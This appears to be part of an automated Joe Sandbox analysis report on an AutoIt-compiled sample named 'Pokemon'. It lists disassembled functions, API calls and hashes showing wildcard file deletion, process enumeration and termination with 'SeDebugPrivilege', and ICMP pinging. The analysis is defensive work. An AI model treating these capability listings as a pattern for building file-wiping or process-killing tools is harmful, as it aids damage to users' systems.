                                                                                                                                                                                                                                                                                      control_flow_graph 1023 fdc54-fdc9b call 9bf73 * 3 call 95851 call feab0 1034 fdc9d-fdca6 call 96b7c 1023->1034 1035 fdcab-fdcdc call 9568e FindFirstFileW 1023->1035 1034->1035 1039 fdcde-fdce0 1035->1039 1040 fdd4b-fdd52 FindClose 1035->1040 1039->1040 1042 fdce2-fdce7 1039->1042 1041 fdd56-fdd78 call 9bd98 * 3 1040->1041 1044 fdce9-fdd24 call 9bed9 call 97bb5 call 96b7c DeleteFileW 1042->1044 1045 fdd26-fdd38 FindNextFileW 1042->1045 1044->1045 1058 fdd42-fdd49 FindClose 1044->1058 1045->1039 1046 fdd3a-fdd40 1045->1046 1046->1039 1058->1041
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00095851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000955D1,?,?,000D4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00095871
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FEAB0: GetFileAttributesW.KERNEL32(?,000FD840), ref: 000FEAB1
                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 000FDCCB
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 000FDD1B
                                                                                                                                                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 000FDD2C
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 000FDD43
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 000FDD4C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                                                                                      • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                                      • Opcode ID: f1b605cf0bff96227f712aed162c895b894c96701ee8d3baff676d11d30126f7
                                                                                                                                                                                                                                                                                      • Instruction ID: fc13167fa04e5261ca0d68f1cc54263ad02d64ea35ba9a4c65b94fbc84067383
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1b605cf0bff96227f712aed162c895b894c96701ee8d3baff676d11d30126f7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77319E31009349AFC710EB20D9918EFB7E9BF91310F400D6EF5D582192EB21DA0AEB63
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 000FDDAC
                                                                                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 000FDDBA
                                                                                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 000FDDDA
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000FDE87
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d364ab24d09b3dcb66a5ede8a11ebd448d44588cfee191aa52da42011f67dee6
                                                                                                                                                                                                                                                                                      • Instruction ID: b008263ca7c180ea920672dafb2dd423fe3f9ee3e7b1b6e242d631e5d6469655
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d364ab24d09b3dcb66a5ede8a11ebd448d44588cfee191aa52da42011f67dee6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88319371008304AFD710EF50DC85AAFBBE8AF95350F14092DF585871A2EB719A49DB92
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetInputState.USER32 ref: 0009EF07
                                                                                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 0009F107
                                                                                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0009F228
                                                                                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 0009F27B
                                                                                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 0009F289
                                                                                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0009F29F
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0009F2B1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2189390790-0

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00093657
                                                                                                                                                                                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 00093681
                                                                                                                                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00093692
                                                                                                                                                                                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 000936AF
                                                                                                                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000936BF
                                                                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A9), ref: 000936D5
                                                                                                                                                                                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000936E4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                      • String ID: +$0$0+m"$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                                      • API String ID: 2914291525-199739205

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000D071A: CreateFileW.KERNEL32(00000000,00000000,?,000D0A84,?,?,00000000,?,000D0A84,00000000,0000000C), ref: 000D0737
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 000D0AEF
                                                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 000D0AF6
                                                                                                                                                                                                                                                                                      • GetFileType.KERNEL32(00000000), ref: 000D0B02
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 000D0B0C
                                                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 000D0B15
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000D0B35
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000D0C7F
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 000D0CB1
                                                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 000D0CB8
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                      • String ID: H
                                                                                                                                                                                                                                                                                      • API String ID: 4237864984-2852464175

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00095594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,000D4B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 000955B2
                                                                                                                                                                                                                                                                                        • Part of subcall function 00095238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0009525A
                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000953C4
                                                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 000D4BFD
                                                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 000D4C3E
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 000D4C80
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000D4CE7
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000D4CF6
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                                      • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                                                                      • Opcode ID: 3ae69a2401054b827a13ca87a48e8ba5bea9060b315aff9e1b0a6ac869eba983
                                                                                                                                                                                                                                                                                      • Instruction ID: 973bf465e4b6c905ebb3215f7ea168e46464aab2f4ea6bfac7a2c40052f8abc1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ae69a2401054b827a13ca87a48e8ba5bea9060b315aff9e1b0a6ac869eba983
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA719E71505301AFC714EF69EC819ABBBE8FF58750F80442EF451932A1EFB19A89CB61

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 000934DE
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 000934ED
                                                                                                                                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 00093503
                                                                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A4), ref: 00093515
                                                                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A2), ref: 00093527
                                                                                                                                                                                                                                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0009353F
                                                                                                                                                                                                                                                                                      • RegisterClassExW.USER32(?), ref: 00093590
                                                                                                                                                                                                                                                                                        • Part of subcall function 00093624: GetSysColorBrush.USER32(0000000F), ref: 00093657
                                                                                                                                                                                                                                                                                        • Part of subcall function 00093624: RegisterClassExW.USER32(00000030), ref: 00093681
                                                                                                                                                                                                                                                                                        • Part of subcall function 00093624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00093692
                                                                                                                                                                                                                                                                                        • Part of subcall function 00093624: InitCommonControlsEx.COMCTL32(?), ref: 000936AF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00093624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000936BF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00093624: LoadIconW.USER32(000000A9), ref: 000936D5
                                                                                                                                                                                                                                                                                        • Part of subcall function 00093624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000936E4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                      • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                                      • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                                      • Opcode ID: a92730d718b2e792ee6051b5b9255eee19ebabbc96c52991eebf8f6b54b76ad5
                                                                                                                                                                                                                                                                                      • Instruction ID: 6b600ac54ea2db410c3798997863ff742ec39b5ecd597e62714ab3564794b24d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a92730d718b2e792ee6051b5b9255eee19ebabbc96c52991eebf8f6b54b76ad5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E213870D10718ABDB109FA5EC49AAABFB4FB0CB54F00402BE604B67A0C7F909958F90

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • WSAStartup.WS2_32(00000101,?), ref: 00111019
                                                                                                                                                                                                                                                                                      • inet_addr.WSOCK32(?), ref: 00111079
                                                                                                                                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 00111085
                                                                                                                                                                                                                                                                                      • IcmpCreateFile.IPHLPAPI ref: 00111093
                                                                                                                                                                                                                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00111123
                                                                                                                                                                                                                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00111142
                                                                                                                                                                                                                                                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 00111216
                                                                                                                                                                                                                                                                                      • WSACleanup.WSOCK32 ref: 0011121C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                                      • String ID: Ping
                                                                                                                                                                                                                                                                                      • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                                                      • Opcode ID: 6956f40e0bc84be4cacc882e236f541c3ee6b249cde53ee9f34ad2315cdc2c0e
                                                                                                                                                                                                                                                                                      • Instruction ID: 9f27399d40c4f4704b25540aa9d0280df3288beac05d76aa8c0a99595703f624
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6956f40e0bc84be4cacc882e236f541c3ee6b249cde53ee9f34ad2315cdc2c0e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2191C131604241BFD724DF25D888F96FBE0BF48318F1585A9F6698B6A2C730ED85CB81

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00093709,?,?), ref: 00093777
                                                                                                                                                                                                                                                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,00093709,?,?), ref: 000937A3
                                                                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000937C6
                                                                                                                                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00093709,?,?), ref: 000937D1
                                                                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 000937E5
                                                                                                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00093806
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                                      • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                                      • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                                                      • Opcode ID: 8f19b994a1a48d2db5f029536e02e098b17ed935bd17b80d0bbef1950ace576d
                                                                                                                                                                                                                                                                                      • Instruction ID: 561258148accc56b6d53fd785d31673c3050f22d23b337c4d52e160b2d8c6ad7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f19b994a1a48d2db5f029536e02e098b17ed935bd17b80d0bbef1950ace576d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5841E6F5208644BBDF342BB8DD4ABBDBAA5E744304F000125F502966D1CBB89F95BF62

                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 49c1fdecb9ed0b7089df95d88541f11cfc7055df3dcac4c33ea69317771cdbb5
                                                                                                                                                                                                                                                                                      • Instruction ID: bfa0d457972591344f291b5df636e800030fb6ebe9326ae6f90dfa046b5ae347
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49c1fdecb9ed0b7089df95d88541f11cfc7055df3dcac4c33ea69317771cdbb5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29C1B070A04289AFDB15DFA8DC49FEDBBF4AF09310F18419DE954A7392C7709A42CB61

                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                                                                                                                                      • API String ID: 0-4285391669
                                                                                                                                                                                                                                                                                      • Opcode ID: e790285939d4b0fb32a9a0a3bee36ef9b6f2bc74c8369fb576674f47e5863536
                                                                                                                                                                                                                                                                                      • Instruction ID: 782bd6acb3a3d58b7c2b2eec636ff17a7d49ac309d6d51987e32cd10fc115813
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e790285939d4b0fb32a9a0a3bee36ef9b6f2bc74c8369fb576674f47e5863536
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97627C70508781CFC728DF25D584AAABBE0FF89304F14896EE499AB352DB71D945CF82

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FDD87: CreateToolhelp32Snapshot.KERNEL32 ref: 000FDDAC
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FDD87: Process32FirstW.KERNEL32(00000000,?), ref: 000FDDBA
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FDD87: CloseHandle.KERNEL32(00000000), ref: 000FDE87
                                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0011ABCA
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0011ABDD
                                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0011AC10
                                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0011ACC5
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 0011ACD0
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0011AD21
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                      • API String ID: 2533919879-2896544425

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      control_flow_graph 1059 935b3-93623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000935E1
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00093602
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00093368,?), ref: 00093616
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00093368,?), ref: 0009361F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                      • API String ID: 1584632944-3779509399

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 1154 961a9-961c0 1155 962a8-962ad 1154->1155 1156 961c6-961db call 97ad5 1154->1156 1159 d5278-d5287 LoadStringW 1156->1159 1160 961e1-961fd call 98577 1156->1160 1163 d5292-d529b 1159->1163 1164 d52ae-d52bc call 95cf9 1160->1164 1165 96203-96207 1160->1165 1166 96229-962a3 call b26b0 call 962ae call b4cf3 Shell_NotifyIconW call 9bd98 1163->1166 1167 d52a1-d52a9 call 9bed9 1163->1167 1164->1166 1176 d52c2-d52cd call fa392 1164->1176 1165->1163 1169 9620d-96224 call 96b7c call 97bb5 1165->1169 1166->1155 1167->1166 1169->1166 1184 d52cf-d52f5 call 9bf73 call fa350 call 97bb5 call 9bd98 1176->1184 1185 d52fa-d5331 call fa31c call afe6f call 96b7c call 95cf9 call 96b7c 1176->1185 1184->1185 1185->1166
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 000D5287
                                                                                                                                                                                                                                                                                        • Part of subcall function 00098577: _wcslen.LIBCMT ref: 0009858A
                                                                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00096299
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: IconLoadNotifyShell_String_wcslen
